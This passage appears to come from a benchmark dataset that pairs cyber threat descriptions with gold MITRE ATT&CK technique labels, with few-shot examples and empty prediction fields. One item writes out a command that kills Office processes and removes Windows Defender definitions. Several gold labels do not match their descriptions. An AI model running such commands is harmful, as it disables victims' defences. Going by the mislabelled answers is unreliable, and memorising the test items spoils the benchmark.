cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The encrypted request includes a PC identifier and timestamp, and optionally some other data. It is worth noting that the RC2FM module uses a number of encryption methods (variations of a simple XOR encryption routine), unlike the other InvisiMole parts\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Frankenstein has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nNote that every string is decrypted with different XOR parameter which may fail some of the automatic analyzers.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine.\n\t - T1082: System Information Discovery\n- Text: njRAT can launch a command shell interface for executing commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: admin@338 actors used the following command after exploiting a machine with LOWBALL malware to acquire information about local networks: \"ipconfig /all >> %temp%\\download\"\n\t - T1016: System Network Configuration Discovery\n", "input": "\nGather network addresses and operating system version Execute arbitrary commands using \u201ccmd.exe /c\u201d The capability to execute system commands", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: creates a backdoor by making a connection using a HTTP POST.\n\t - T1071: Application Layer Protocol\n- Text: 13 Copy file to adbFle.tmp, and upload it to the C2\n\t - T1105: Ingress Tool Transfer\n- Text: The two main changes are the obfuscation and the network protocol to communicate to the C2 server. The developers used two different obfuscation algorithms: one for the C2 encoding and one for the data. The C2 encoding is a simple XOR (as in 2012): The C2 encoding communication is also different. As the data are now sent with the GET method, the data must be in ASCII. That's they add base64 encoding in order to get supported characters in the HTTP query. For the first time, the developer switched from POST requests to GET requests: The exfiltrated data is appended to the URL. Here is the pattern: hxxp://C2_domain/MalwareIDVictimIPThirdIDExfiltratedDataBase64 SHA256:37d1bd82527d50df3246f12b931c69c2b9e978b593a64e89d16bfe0eb54645b0 C2 URL:hxxp://www[.]amanser951[.]otzo[.]com/uiho0.0.0.0edrftg.txt\n\t - T1041: Exfiltration Over C2 Channel\n", "input": "\nResponds to the IRC server via PRIVMSG with \u201cDownload\u00a0 Success :FilePath=\u201d or \u201cDownload Fail\u201d if unsuccessful", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When executed, the final macro code as interpreted by CMD decodes into a classic PowerShell download cradle that fetches the initial QakBot payload. There is one last bit of obfuscation here as the script does contain two more encoded strings. One is the URL as seen above in Figure 8, and another is the full path to which the payload will initially be written: \u201cC:\\Users\\Public\\tmpdir\\file\u201d.\u00a0\n\t - T1059: Command and Scripting Interpreter\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: QakBot can use cmd.exe to launch itself and to execute multiple C2 commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: this Excel template was created by a threat actor trying to instill confidence by taking advantage of the DocuSign brand name and image.\n\t - T1137.001: Office Application Startup - Office Template Macros\n\t - T1221: Template Injection\n", "input": "\nuses a command prompt to run a PowerShell script from Excel.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: (Source: Dell SecureWorks) TG-3390 actors have also used the following publicly available tools: Windows Credential Editor (WCE) \u2014 obtains passwords from memory gsecdump \u2014 obtains passwords from memory winrar \u2014 compresses data for exfiltration nbtscan \u2014 scans NetBIOS name servers Tactics, techniques, and procedures Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions\n\t - T1003: OS Credential Dumping\n- Text: Uses Mimikatz to harvest credentials.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.003: OS Credential Dumping - NTDS\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", "input": "\nhas been known to dump credentials.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The data is encrypted using a series of XOR and addition operations, followed by decompression using the ZLIB library\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Penquin can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: Techniques for Analysis When I was analyzing this sample, the malware was unable to connect to its C2.\u00a0 However, I was still able to analyze the network traffic of the sample.\u00a0 How, you might ask?\u00a0 Using a hex editor and a script I wrote to encrypt text using the algorithm that this sample uses, I encrypted my own C2 address (192.168.1.108:7721) and replaced the hardcoded C2 address with my own encrypted address.\u00a0 I then opened a listener on my own IP on the respective port.\u00a0 \u00a0 [Screenshot 3] comparison of My IP (Left) vs C2 IP (Right) Next, using a debugger, I set a couple breakpoints in the Internet Communications function and ran the malware.\u00a0 The malware sample then connected to my IP and sent information to me, which I was able to observe using Wireshark.\u00a0 After I\u2019d captured the traffic, I was able to write another script to decrypt and decompress the traffic in order to view the data being sent.\u00a0 Additionally, I then wrote a socket script that detects the Gh0stRAT variant traffic, automatically decrypts the traffic, and then extracts the Implant_Opcodes for the sample.\u00a0 A second version of the script allows commands to be sent back to the malware, after I enumerated the exact command format for the sample.\u00a0 [Screenshot 4] Output of Version 1 of the script So far, the 2 opcodes that the sample has sent are 0x65 and 0x66, or Implant_Heartbeat and Implant_Login, respectively.\u00a0 \u201cHitting between the heartbeats\u201d When sending commands, first the sample must login in with 0x65, then you can send commands to it.\u00a0 However, you have to move fast as the sample will send an Implant_Heartbeat followed by an Implant_Login every 10 seconds or so, and if you try to send a command to the sample as it is responding with either opcode, it will ignore the command.\u00a0 A proof of concept of the command script can be found\u00a0here\u00a0, while the Implant extraction script and the Command Script will be included in the Appendix\n\t - T1573: Encrypted Channel\n\t - T1132: Data Encoding\n", "input": "\nuses custom encryption for C2 using 3DES and RSA.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bumblebee can inject code into multiple processes on infected endpoints.\n\t - T1055: Process Injection\n- Text: If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload. Kazuar can also be configured to inject and execute within specific processes.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: SHARPSTATS has the ability to employ a custom PowerShell script.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nThe fact that the actor used Metasploit shellcode within the Unicorn generated PowerShell script leads us to speculate that the ultimate payload of this attack is Meterpreter, which is a shellcode-based payload", "gold": "- T1064: Scripting\n- T1059.001: Command and Scripting Interpreter - PowerShell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: compromised McAfee ePO to move laterally by distributing malware as a software deployment task.\n\t - T1072: Software Deployment Tools\n- Text: APT29 gained initial network access to some victims via a trojanized update of SolarWinds Orion software.\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n- Text: was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.\n\t - T1195: Supply Chain Compromise\n", "input": "\nIt is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the malware.", "gold": "- T1072: Software Deployment Tools", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Regin appears to have functionality to modify remote Registry information.\n\t - T1112: Modify Registry\n- Text: Fox Kitten has used cmd.exe likely as a password changing mechanism.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: It can terminate IDA debugger, x32dbg, OllyDbg and more processes to avoid dynamic analysis, close databases, office programs and security tools\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", "input": "\nThe macro performs all of these activities with the following command:cmd /c taskkill /f /im winword.exe&taskkill /f /im Excel.exe&taskkill /f /im MSPUB.exe&taskkill /f /im POWERPNT.EXE&taskkill /f /im MSASCuiL.exe&taskkill /f /im MpCmdRun.exe&cd \"\"%ProgramFiles%\\Windows Defender\"\" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exitThe macro also attempts to deactivate security mechanisms within Microsoft Office products by modifying the registry", "gold": "- T1055.012: Process Injection - Process Hollowing\n- T1036: Masquerading\n- T1112: Modify Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command\n\t - T1039: Data from Network Shared Drive\n\t - T1083: File and Directory Discovery\n- Text: Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Using legitimate tools like PsExec will save the adversary time from writing their own tooling. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - \u25bc February (14) CannibalRAT targets Brazil Who Wasn\u2019t Responsible for Olympic Destroyer\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: WhisperGate can enumerate connected remote logical drives.\n\t - T1135: Network Share Discovery\n", "input": "\nhas collected data from remote systems by mounting network shares with net use and using Robocopy to transfer data.", "gold": "- T1039: Data from Network Shared Drive", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WIRTE has downloaded PowerShell code from the C2 server to be executed.\n\t - T1105: Ingress Tool Transfer\n- Text: TeamTNT has uploaded backdoored Docker images to Docker Hub.\n\t - T1608.001: Stage Capabilities - Upload Malware\n- Text: Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \"BlackWater\" is associated with suspected persistent threat actor MuddyWater. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs. In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field\n\t - T1104: Multi-Stage Channels\n", "input": "\ncan upload and download files, including second-stage malware.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InnaputRAT enumerates directories and obtains file attributes on a system.\n\t - T1083: File and Directory Discovery\n- Text: FIN7 developed evasive techniques at a rapid pace. Throughout 2017, FIN7 was observed creating novel obfuscation methods, and in some cases modifying the methods on a daily basis while launching attacks targeting multiple victims. Their development of a payload obfuscation style using the Windows command interpreter's (cmd.exe) native string substitution was so unique that FireEye dubbed it \"FINcoding. These methods inspired deep command line obfuscation research and the release of Daniel Bohannon's Invoke-DOSfuscation. Reference Table 2 and Table 3 for a selection of samples and their associated command line obfuscation techniques\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: As seen below, the relational analysis proved to be quite fruitful: Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic: Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads\n\t - T1518.001: Software Discovery - Security Software Discovery\n", "input": "\nhas a command to return a directory listing for a specified directory.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE BUTLER has used at to register a scheduled task to execute malware during lateral movement.\n\t - T1053.002: Scheduled Task/Job - At\n- Text: HOPLIGHT has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.\n\t - T1047: Windows Management Instrumentation\n- Text: Small Sieve can use `cmd.exe` to execute commands on a victim's system.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nIt can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts", "gold": "- T1087: Account Discovery\n- T1046: Network Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: To create the scheduled task, the PowerShell payload starts by writing the following to a VBScript file with the same name as the task name \u00a0(ex\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1036: Masquerading\n- Text: MiniDuke uses HTTP and HTTPS for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nOne sample in particular, cba5ab65a\u2026 used yet another unique user agent string in combination with the previous user agent for its C2: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1 A malware sample using two separate unique user agent strings is uncommon", "gold": "- T1033: System Owner/User Discovery\n- T1543.001: Create or Modify System Process - Launch Agent", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once installed, JSSLoader provides the threat group with a backdoor to the victim\u2019s computer and the organization\n\t - T1204.002: User Execution - Malicious File\n\t - T1047: Windows Management Instrumentation\n- Text: KOMPROGO is capable of retrieving information about the infected system.\n\t - T1082: System Information Discovery\n- Text: Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", "input": "\nmalware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Silence has weaponized CHM files in their phishing campaigns.\n\t - T1218.001: System Binary Proxy Execution - Compiled HTML File\n- Text: Invoke-PSImage can be used to embed payload data within a new image file.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n- Text: Carbanak encrypts strings to make analysis more difficult.\n\t - T1027: Obfuscated Files or Information\n", "input": "\nhas used CHM files to move concealed payloads as part of.", "gold": "- T1218.001: System Binary Proxy Execution - Compiled HTML File", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PcShare can search the registry files of a compromised host.\n\t - T1012: Query Registry\n- Text: Reg may be used to find credentials in the Windows Registry.\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: identifies security software such as antivirus through the Security module.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", "input": "\nmay query the Registry by running reg query on a victim.", "gold": "- T1012: Query Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.\n\t - T1221: Template Injection\n- Text: Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.\n\t - T1204.002: User Execution - Malicious File\n- Text: In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. Once opened, Excel will retrieve whatever object is at the URL inside the file. These files have most recently been found in use by criminals to deliver commodity RATs such as Flawed Ammyy. In DarkHydrus's case, the preferred payload retrieved in their previous attacks were exclusively open-source legitimate tools which they abuse for malicious purposes, such as Meterpreter and Cobalt Strike. However, in this instance, it appears that this group used a custom PowerShell based payload that we call RogueRobin\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nhas sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the \u201cattachedTemplate\u201d technique to load a template from a remote server.", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: StreamEx uses rundll32 to call an exported function.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: The script queries WMI to list all the explorer.exe processes, where it will try to inject the malicious payload. For the injection, the attackers used Mavinject (a legitimate Windows component that can be used and abused) to perform arbitrary code injections inside any running process. Mavinject.exe has been abused for several years, as indicated in this blog from 2017.\n\t - T1218.013: System Binary Proxy Execution - Mavinject\n", "input": "\n19-1 regsvr32 running the .dlls Fig", "gold": "- T1218.010: System Binary Proxy Execution - Regsvr32", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once the Bazar loader downloads its payload, the Bazar backdoor, it is decrypted using the same method as the aforementioned Team9 variant\n\t - T1104: Multi-Stage Channels\n- Text: CookieMiner has used a Unix shell script to run a series of commands targeting macOS.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9\n\t - T1059: Command and Scripting Interpreter\n", "input": "\nuses a backdoor known as BADFLICK that is is capable of generating a reverse shell.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MSTIC has observed NICKEL drop their malware into existing installed software paths. They did this to make their malware appear to be files used for an installed application. The following are example paths\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface.\n\t - T1036: Masquerading\n- Text: Crutch has established persistence with a scheduled task impersonating the Outlook item finder.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", "input": "\nhas dropped binaries as files named microsoft_network.exe and crome.exe.", "gold": "- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: After the variables are set, the command line script copies QlpxpQpOpDpnpRpC.ini to the executable name that has been picked for this run and then attempts to kill any legitimate process using the specified name before launching it. The name for the .ini file is randomized per archive, but almost always turns out to be that of the VNC server itself\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.\n\t - T1204.002: User Execution - Malicious File\n", "input": "\nFigure 4: Downloading second stage Seminar.rtf The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via Equation Editor executable", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Carbon uses HTTP to send data to the C2 server.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: The results of the decoded data may be seen below: \u00a0 Figure 13 Decrypted information The decrypted data contains URLs for various online services that will be used by the attacker for 